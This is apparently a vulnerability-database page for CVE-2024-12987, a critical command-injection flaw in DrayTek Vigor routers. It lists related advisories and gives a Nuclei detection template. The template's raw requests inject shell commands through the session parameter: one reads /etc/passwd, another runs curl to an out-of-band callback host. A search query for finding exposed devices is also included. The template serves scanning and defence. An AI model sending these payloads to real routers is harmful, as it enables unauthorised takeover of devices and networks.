| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2024-12987 | 27 Dec 202400:00 | – | attackerkb | |
| The vulnerability in the web interface for managing microprogrammed routing software from DrayTek, namely DrayTek Vigor2960 and Vigor300B, allows a hacker to execute arbitrary code. | 3 Jan 202500:00 | – | bdu_fstec | |
| CVE-2024-12987 | 27 Dec 202416:15 | – | circl | |
| DrayTek Vigor Routers OS Command Injection Vulnerability | 15 May 202500:00 | – | cisa_kev | |
| CISA Adds Three Known Exploited Vulnerabilities to Catalog | 15 May 202512:00 | – | cisa | |
| DrayTek Vigor300B和DrayTek Vigor2960 安全漏洞 | 27 Dec 202400:00 | – | cnnvd | |
| CVE-2024-12987 | 27 Dec 202416:00 | – | cve | |
| CVE-2024-12987 DrayTek Vigor2960/Vigor300B Web Management Interface apmcfgupload os command injection | 27 Dec 202416:00 | – | cvelist | |
| DrayTek Vigor 1.5.1.4 < 1.5.1.5 Command Injection | 14 Jul 202500:00 | – | nessus | |
| CVE-2024-12987 | 27 Dec 202416:15 | – | nvd |
| Source | Link |
|---|---|
| netsecfish | www.netsecfish.notion.site/ |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2024-12987 |
id: CVE-2024-12987
info:
name: DrayTek Vigor - Command Injection
author: ritikchaddha
severity: critical
description: |
DrayTek Gateway devices (Vigor2960, Vigor300B, etc.) are vulnerable to command injection via the session parameter in the /cgi-bin/mainfunction.cgi/apmcfgupload endpoint. An attacker can inject arbitrary commands and retrieve their output.
impact: |
Unauthenticated attackers can inject arbitrary system commands through the session parameter in the apmcfgupload endpoint to execute commands on DrayTek routers, enabling complete device compromise and network infiltration.
remediation: |
Update the firmware to the latest version provided by DrayTek. If no update is available, consider implementing network segmentation to restrict access to the device's management interface.
reference:
- https://netsecfish.notion.site/
- https://nvd.nist.gov/vuln/detail/CVE-2024-12987
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-12987
cwe-id: CWE-78
epss-score: 0.98125
epss-percentile: 0.99905
cpe: cpe:2.3:h:draytek:vigor300b:-:*:*:*:*:*:*:*
metadata:
max-request: 2
fofa-query: '"excanvas.js" && "lang == \"zh-cn\"" && "detectLang" && server=="DWS"'
vendor: DrayTek
product: Vigor300B
tags: cve,cve2024,draytek,rce,router,kev,vkev,vuln
http:
- raw:
- |+
GET /cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0.%52$c%52$ccat${IFS}/etc/passwd HTTP/1.0
Host: {{Hostname}}
- |+
GET /cgi-bin/mainfunction.cgi/apmcfgupload?session=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx0.%52$c%52$ccurl${IFS}{{interactsh-url}} HTTP/1.0
Host: {{Hostname}}
stop-at-first-match: true
unsafe: true
matchers-condition: or
matchers:
- type: dsl
dsl:
- regex('root:.*:0:0:', body)
- contains(header, 'DWS')
- status_code == 200
condition: and
- type: dsl
dsl:
- contains(interactsh_protocol, 'dns')
- contains(header, 'DWS')
- status_code == 200
condition: and
# digest: 4a0a0047304502202e21ae5269ed67f29db6c038a386f931acf066c883901bf422622a8f5068049a022100e6f358c1a5c7e25f0f614d56aa68d669e7bc87737f02acf2932e52178df6cc15:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation